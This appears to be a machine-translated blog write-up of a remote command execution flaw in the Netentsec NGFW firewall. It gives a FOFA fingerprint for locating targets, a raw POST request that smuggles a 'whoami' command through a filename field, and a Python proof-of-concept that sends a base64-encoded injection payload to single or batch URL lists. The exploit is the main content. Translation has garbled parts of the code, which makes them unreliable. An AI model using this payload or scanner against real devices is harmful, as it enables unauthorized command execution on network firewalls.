Disclaimer: The following script is offensive, please do not use it illegally, otherwise the consequences are at your own risk. Do not perform unauthorized tests. Otherwise, you are responsible for the consequences.
1. Introduction
During 2021HW, a remote command execution vulnerability is exposed on the next-generation firewall of the netkang NGFW of Beijing netkang technology co., LTD. The vulnerability number has not been found on CNVD. It should be that CNVD has not disclosed the vulnerability. But there are already articles on the Internet that reproduce and analyze vulnerabilities.
2. Vulnerability Overview
Netcom next-generation Firewall (NGFW) is a high-performance application-layer firewall designed by Netcom technology to fully respond to network threats. However, remote command execution vulnerability exists on the NGFW. Attackers can execute system commands by constructing special requests.
3. Vulnerability principle
The vulnerability is found in HTML \applications\ DirectData \controllers\ directController.php.
For vulnerability analysis, please refer to:www.o2oxy.cn/3433.html
4. Affect the version
Version Unknown (version before 20210419)
5. Vulnerability level
At high risk of
6. Vulnerability recurrence
6.1 FOFA combat reappearance
Key words: FOFA
cert=”11558588834859436962″
POST content: POST/directdata HTTP / 1.1 / direct/router Host: X.X.X.X Connection: close cache-control: max-age=0 sec-ch-ua: "Google Chrome"; v="89", "Chromium"; v="89", "; Not A Brand"; v="99" sec-ch-ua-mobile: ? 0 upgrade-insecure -Requests: 1 User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/avif, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q =0.9 sec-fetch -Site: None sec-fetch -Mode: navigate sec-fetch -User:? 1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh; Q = 0.9, en. Q = 0.8 cookies: PHPSESSID = q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A Content-Type: application/x-www-form-urlencoded Content-Length: 167 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/.atest.txt;whoami >/var/www/html/atest.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}Copy the code
6.2 netentsec_NGFW_RCE_POC. Py
#! /usr/bin/python
# Env: python3
# Author: afei00123
# -*- coding: utf8 -*-
import requests, urllib3, base64, time, json, argparse
from colorama import init
init(autoreset=True)
def title() :
print("")
print(The '*'.center(60.The '*'))
print("Netkang NGFW Next-generation Firewall (Version unknown)".center(30))
print("github:https://github.com/ltfafei".center(50))
print("gitee:https://gitee.com/afei00123".center(50))
print("CSDN: afei00123.blog.csdn.net".center(50))
print("Public account: Network operation and maintenance penetration".center(40))
print("")
print(The '*'.center(60.The '*'))
print("")
class netentsec_NGFW_POC() :
def NGFW_RCE_Check(self, url) :
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
target_url = f"{url}/directdata/direct/router"
headers = {
"User-Agent": "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; Rv :82.0) Gecko/20100101 Firefox/82.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"."Cache-Control": "max-age=0"."accept": "image/avif,image/webp,image/apng,image/*,*/*; Q = 0.8"."sec-ch-ua": '"Google Chrome"; v="89", "Chromium"; v="89", "; Not A Brand"; v="99"'."sec-ch-ua-mobile": "? 0"."Upgrade-Insecure-Requests": "1"."Accept": "text/html,application/xhtml+xml,application/xml; Q = 0.9, image/avif, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q = 0.9"."Sec-Fetch-Site": "none"."Sec-Fetch-Mode": "navigate"."Sec-Fetch-User": "? 1"."Sec-Fetch-Dest": "document"."Accept-Encoding": "gzip, deflate"."Accept-Language": "zh-CN,zh; Q = 0.9, en. Q = 0.8"."Cookie": "PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A"."Content-Type": "application/x-www-form-urlencoded",
}
payload = base64.b64decode("eyJhY3Rpb24iOiJTU0xWUE5fUmVzb3VyY2UiLCJtZXRob2QiOiJkZWxldGVJbWFnZSIsImRhdGEiOlt7ImRhdGEiOlsiL3Zhci93d3cvaHRtbC8uYXRlc3Q udHh0O2VjaG8gYWZlaWNvbWUgPi92YXIvd3d3L2h0bWwvYXRlc3QudHh0Il19XSwidHlwZSI6InJwYyIsInRpZCI6MTcsImY4ODM5cDdycXRqIjoiPSJ9")
try:
s = requests.session()
list_data = s.post(target_url, headers=headers, data=payload, verify=False, timeout=2).json()
status = list_data[0] ['result'].get("success")
if status:
print(f"\033[31m[+] {url}Remote command execution vulnerability is very possible!")
with open("NGFW_RCE_vuln.txt"."a+") as f:
f.writelines(url + "\n")
except Exception as e:
print(f"[n] {url}There is no such vulnerability.")
return url
def NGFW_Batch_Check(self, url, file) :
if url:
return True
elif file:
for url in file:
url = url.replace('\n'.' ')
time.sleep(1)
self.NGFW_RCE_Check(url)
if (__name__ == "__main__"):
title()
parser = argparse.ArgumentParser(description="netentsec NGFW RCE POC")
parser.add_argument(
'-u'.'--url'.type=str.help='Please input target url. eg: https://ip:port'
)
parser.add_argument(
'-f'.'--file'.type=argparse.FileType('r'),
help='Please input urls file path. eg: c:\\urls.txt'
)
args = parser.parse_args()
run_POC = netentsec_NGFW_POC()
if args.file:
run_POC.NGFW_Batch_Check(args.url, args.file)
print("\n[done] Batch probe completed, please check: ngfw_rce_vuln.txt")
if args.url:
run_POC.NGFW_RCE_Check(args.url)
Copy the code
6.3 netentsec_NGFW_RCE_EXP. Py
. This, no original address: blog.csdn.net/qq_41490561…
7. Bug fix
You are advised to contact the vendor to install a patch.